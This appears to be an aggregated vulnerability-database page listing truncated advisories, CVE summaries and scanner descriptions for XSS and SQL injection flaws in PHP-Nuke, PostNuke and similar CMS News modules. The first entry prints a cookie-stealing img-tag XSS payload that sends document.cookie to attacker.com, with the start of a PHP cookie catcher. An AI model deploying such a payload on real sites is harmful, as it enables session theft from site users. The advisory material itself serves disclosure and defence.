Php-Nuke Pool and News Module IMG Tag Cross Site

NightWarriorKurdihs Hacker nightwarrior771athotmail.com Php-Nuke Pool and News Module IMG Tag Cross Site Scripting Contact :nightwarrior771athotmail.com Post Coment this Code: img src="javascript:window.navigate'http://attacker.com/cookies.php?c='+document.cookie;" cookies.php $cookie = $GET'c';...

CVE-2005-4262

Cross-site scripting XSS vulnerability in the News module in Envolution allows remote attackers to inject arbitrary web script or HTML via the 1 startrow and 2 catid parameter. NOTE: this issue might be resultant from the SQL injection problem CVE-2005-4263...

CVE-2005-4263

SQL injection vulnerability in the News module in Envolution allows remote attackers to execute arbitrary SQL commands via the 1 startrow and 2 catid parameter...

CVE-2005-4263

CVE-2005-4263 is a SQL injection vulnerability in the News module of Envolution. The issue allows remote attackers to inject arbitrary SQL commands through the startrow and catid parameters, potentially impacting data integrity and confidentiality as described in the cited records. The connected ...

CVE-2005-4262

CVE-2005-4262 is described as a cross-site scripting (XSS) vulnerability in the Envolution News module. The issue allows remote attackers to inject arbitrary web script or HTML through the (1) startrow and (2) catid parameters. The description notes this issue may be related to an SQL injection p...

CVE-2005-4262

Cross-site scripting XSS vulnerability in the News module in Envolution allows remote attackers to inject arbitrary web script or HTML via the 1 startrow and 2 catid parameter. NOTE: this issue might be resultant from the SQL injection problem CVE-2005-4263...

CVE-2005-4263

SQL injection vulnerability in the News module in Envolution allows remote attackers to execute arbitrary SQL commands via the 1 startrow and 2 catid parameter...

Post-Nuke News module XSS

The remote host is running a version of Post-Nuke which contains the 'News' module which itself is vulnerable to a cross site scripting issue. An attacker may use these flaws to steal the cookies of the legitimate users of this web site. OpenVAS Vulnerability Test $Id: postnukenewsxss.nasl 9087...

PT-2005-3706 · Maxdev · Maxdev Md-Pro

Name of the Vulnerable Software and Affected Versions: MAXdev MD-Pro versions 1.0.72 and earlier Description: The issue affects one or more modules in MAXdev MD-Pro, including the Download, Search, Web links, Blocks, Messages, News, Comments, Settings, Stats, or subjects modules. The impact and...

CVE-2005-1508

PWSPHP (Portail Web System) is affected by cross-site scripting (XSS) in version 1.2.2 due to insufficient input validation in multiple modules/parameters (e.g., news, stats, profil.php, memberlist, recherche) and specifically the SettingsBase.php skin parameter per the NASL entry. The vulnerabil...

CVE-2005-1508

Multiple cross-site scripting XSS vulnerabilities in PwsPHP 1.2.2 allow remote attackers to inject arbitrary web script or HTML via the 1 month or 2 annee parameters to the news module, 3 nbractif or 4 annee parameters to the stats module, 5 id parameter to profil.php, 6 mblettre or 7 lettre...

CVE-2005-1508

Multiple cross-site scripting XSS vulnerabilities in PwsPHP 1.2.2 allow remote attackers to inject arbitrary web script or HTML via the 1 month or 2 annee parameters to the news module, 3 nbractif or 4 annee parameters to the stats module, 5 id parameter to profil.php, 6 mblettre or 7 lettre...

CVE-2004-2020

Multiple cross-site scripting XSS vulnerabilities in Php-Nuke 6.x through 7.3 allow remote attackers to inject arbitrary HTML or web script into the 1 optionbox parameter in the News module, 2 date parameter in the Statistics module, 3 year, month, and month1 parameters in the StoriesArchive...

CVE-2005-0674

The CVE-2005-0674 entry concerns the paBox 1.6 News module, where a cross-site scripting (XSS) flaw exists in the News module’s handling of the hidden text parameter in an HTTP POST. The connected documents corroborate an XSS issue affecting paBox/Nuke-based deployments (e.g., Nessus plugin refer...

CVE-2005-0674

Cross-site scripting XSS vulnerability in the News module for paBox 1.6 allows remote attackers to inject arbitrary web script or HTML via the text hidden parameter in an HTTP POST request...

postnukeSQL0760.txt

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PostNuke Critical SQL Injection 0.760-RC2=x cXIb8O3.1 Author: cXIb8O3Maksymilian Arciemowicz Date: 15.2.2005 from securityreason.com TEAM - --- 0.Description --- PostNuke: The Phoenix Release 0.760-RC2=x PostNuke is an open source, open developement...

PostNuke News Module article.php sid Parameter XSS

The remote host is running a version of PostNuke which contains the 'News' module which itself is vulnerable to a cross-site scripting issue. An attacker may use these flaws to steal the cookies of the legitimate users of this website. %NASLMINLEVEL 70300 C Tenable Network Security, Inc...

PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting

source: https://www.securityfocus.com/bid/9605/info It has been reported that the PHP-Nuke module 'News' is prone to a cross-site scripting vulnerability. The issue arises due to the module failing to properly sanitize user-supplied information. This could allow for execution of hostile HTML and...

PHP-Nuke 5.66.x News Module - index.php SQL Injection

PHP-Nuke 5.66.x News Module - index.php SQL Injection source: https://www.securityfocus.com/bid/7173/info It has been reported that an input validation error exists in the index.php file included with PHPNuke as part of the News module. Because of this, an attacker could send a malicious string...

PHP-Nuke 5.6/6.x News Module - 'index.php' SQL Injection

source: https://www.securityfocus.com/bid/7173/info It has been reported that an input validation error exists in the index.php file included with PHPNuke as part of the News module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to...